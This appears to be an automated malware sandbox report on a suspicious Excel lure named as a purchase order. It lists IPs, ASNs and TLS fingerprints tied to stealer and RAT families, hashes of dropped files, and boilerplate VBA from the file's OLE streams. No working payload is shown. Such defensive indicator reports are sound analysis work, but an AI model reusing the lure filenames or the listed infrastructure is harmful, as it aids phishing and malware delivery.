                            edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comFork.exeGet hashmaliciousBabadedaBrowse
                            • 217.20.57.19
                            theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                            • 217.20.57.34
                            AgnotSecurity.exeGet hashmaliciousUnknownBrowse
                            • 217.20.57.36
                            file.exeGet hashmaliciousVidarBrowse
                            • 84.201.210.23
                            GalaxySoft.exeGet hashmaliciousLummaC StealerBrowse
                            • 217.20.57.20
                            Down-2021.exeGet hashmaliciousUnknownBrowse
                            • 217.20.57.20
                            GlitchNote.exeGet hashmaliciousUnknownBrowse
                            • 217.20.57.20
                            MBRWrite.exeGet hashmaliciousUnknownBrowse
                            • 217.20.57.20
                            Setup.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                            • 217.20.57.19
                            v7942.exeGet hashmaliciousStealc, VidarBrowse
                            • 217.20.57.35

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AS-COLOCROSSINGUSclearpicturewithmebestthingsforgivenmebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                            • 172.245.123.24
                            needagoodplanforsuccesstogetbackbest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                            • 23.95.235.28
                            needagoodplanforsuccesstogetbackbest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                            • 23.95.235.28
                            niceworkingskillgivenmebest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                            • 198.12.89.24
                            verynicegirlgivenmebestwordforgreatnesswithgoodthings.htaGet hashmaliciousUnknownBrowse
                            • 192.3.95.138
                            Build.exeGet hashmaliciousStormKittyBrowse
                            • 23.94.126.116
                            h2wb5_002.exeGet hashmaliciousDarkVision RatBrowse
                            • 104.168.28.10
                            dBKUxeI.exeGet hashmaliciousAsyncRAT, DarkVision RatBrowse
                            • 104.168.28.10
                            random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
                            • 107.174.192.179
                            earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaGet hashmaliciousRemcosBrowse
                            • 172.245.191.88
                            TIMEWEB-ASRUpered.exeGet hashmaliciousUnknownBrowse
                            • 2.59.41.142
                            DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            niga.jarGet hashmaliciousUnknownBrowse
                            • 2.59.41.142
                            GjThRAJ.exeGet hashmaliciousUnknownBrowse
                            • 2.59.41.142
                            splx86.elfGet hashmaliciousUnknownBrowse
                            • 92.53.113.157
                            i686.elfGet hashmaliciousMiraiBrowse
                            • 188.225.75.215
                            MICROSOFT-CORP-MSN-AS-BLOCKUShgfs.ppc.elfGet hashmaliciousUnknownBrowse
                            • 13.99.168.12
                            hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                            • 52.101.21.152
                            hgfs.mpsl.elfGet hashmaliciousUnknownBrowse
                            • 13.76.184.174
                            hgfs.arm.elfGet hashmaliciousUnknownBrowse
                            • 52.173.237.73
                            hgfs.mips.elfGet hashmaliciousUnknownBrowse
                            • 20.168.115.135
                            Ux0UEsDo6vJYire.exeGet hashmaliciousFormBookBrowse
                            • 204.79.197.203
                            fa09d24d7481dbdfc1cff6aaa92d2aec908e037a22a02346f6feeee5d6ba688e.exeGet hashmaliciousSalityBrowse
                            • 131.253.33.254
                            custom.exeGet hashmaliciousSalityBrowse
                            • 204.79.197.203
                            e9f03b80e02865689b68e810996cea747718f9e4ed21cad621fa7a014cdab7c8.exeGet hashmaliciousSalityBrowse
                            • 204.79.197.203
                            hgfs.ppc.elfGet hashmaliciousUnknownBrowse
                            • 52.155.78.59

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            6271f898ce5be7dd52b0fc260d0662b3windows-7-ultimate-x64-sp1.iso.exeGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            Andrej Simulator X.exeGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            test2.exe.bin.exeGet hashmaliciousXWormBrowse
                            • 188.225.72.170
                            FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                            • 188.225.72.170
                            FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                            • 188.225.72.170
                            Busy2.0.exeGet hashmaliciousBabadedaBrowse
                            • 188.225.72.170
                            MSBuild.exeGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            Our Order.xlsGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.60
                            SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.60
                            stk.dllGet hashmaliciousUnknownBrowse
                            • 13.107.246.60
                            12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.60
                            SystemProcess18.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                            • 13.107.246.60
                            Setup.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.60
                            Setup.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.60
                            #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.60
                            2PFebPN0qK.exeGet hashmaliciousLatrodectus, LummaC StealerBrowse
                            • 13.107.246.60
                            #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.60

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):118
                            Entropy (8bit):3.5700810731231707
                            Encrypted:false
                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                            MD5:573220372DA4ED487441611079B623CD
                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                            C:\Users\user\AppData\Local\Temp\E3505C79.tmp

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):784
                            Entropy (8bit):2.7137690747287806
                            Encrypted:false
                            SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                            MD5:09F73B3902CD3D88E04312787956B654
                            SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                            SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                            SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.

                            C:\Users\user\AppData\Local\Temp\~DFE7FB744BCB7D127A.TMP

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\Desktop\~$PO#4500550389.xla.xlsx

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):165
                            Entropy (8bit):1.7769794087092887
                            Encrypted:false
                            SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                            MD5:37BD8218D560948827D3B948CAFA579C
                            SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                            SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                            SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                            Malicious:true
                            Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 17 02:57:46 2025, Security: 1
                            Entropy (8bit):7.832961984010229
                            TrID:
                            • Microsoft Excel sheet (30009/1) 47.99%
                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                            File name:PO#4500550389.xla.xlsx
                            File size:1'172'480 bytes
                            MD5:f871e42b797cf70e3ee4a79e21f02197
                            SHA1:b03ebab29eab8c27f1a814494953147a9b90322f
                            SHA256:ecc360802ade998b33380472d1b5ce4dc95e4039daf93123ba3885e2716dc012
                            SHA512:f641e3a231b6b0896fc35749ddcac371e5d5b46c07b0256eb8bf77d73e63eb149816d274c6b17c263481fbc54993e2b52d029f9fc7ca3f84ccc54043d14b3c76
                            SSDEEP:24576:BLA6DHtWjejsk4McupJIwgxIOXR8YhbBWvdp8tLUWBMDcaPFKM:+SaejH4MTpzguM8YkpwLUwhM
                            TLSH:01450294EFC05A26CA0D02350FE38B5C5A15EEEA5745620F3235BE1D3EB6B3E0B72519
                            File Content Preview:........................>......................................................................................................................................................................................................................................

                            File Icon

                            Icon Hash:35e58a8c0c8a85b9

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "PO#4500550389.xla.xlsx"

                            Indicators
                            Has Summary Info:
                            Application Name:Microsoft Excel
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Summary
                            Code Page:1252
                            Author:
                            Last Saved By:
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2025-03-17 02:57:46
                            Creating Application:Microsoft Excel
                            Security:1
                            Document Summary
                            Document Code Page:1252
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:786432
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                            VBA File Name:Sheet1.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 10 08 97 a3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                            VBA File Name:Sheet2.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 10 08 25 5f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                            VBA File Name:Sheet3.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` % . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 10 08 60 25 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                            VBA File Name:ThisWorkbook.cls
                            Stream Size:985
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 10 08 32 10 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.889430592781307
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:200
                            Entropy:3.2503503175049815
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . # \\ . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                            General
                            Stream Path:MBD00C9763A/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00C9763A/\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:296
                            Entropy:3.2973193143624515
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 ! P r i n t _ A r e a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b7 00 00 00 02 00 00 00 e4 04 00 00
                            General
                            Stream Path:MBD00C9763A/\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:31156
                            Entropy:3.1876994904322484
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . y . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K e n n y C h e u n g . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . m . . . @ . . . . _ ~ . \\ S . @ . . . . . . . . . . . . G . . . x . . . . . . . . 0 . . . . . . . . . . T < . . . . . . . . . . . . . . & .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 79 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 11 00 00 00 c4 00 00 00
                            General
                            Stream Path:MBD00C9763A/MBD00320C7F/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.219515110876372
                            Base64 Encoded:False
                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00C9763A/MBD00320C7F/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:613686
                            Entropy:7.989056691241232
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . . X . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 1a 58 13 82 c0 01 00 00 90 07 00 00 13 00 bb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 b7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00C9763A/MBD00321A49/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.219515110876372
                            Base64 Encoded:False
                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
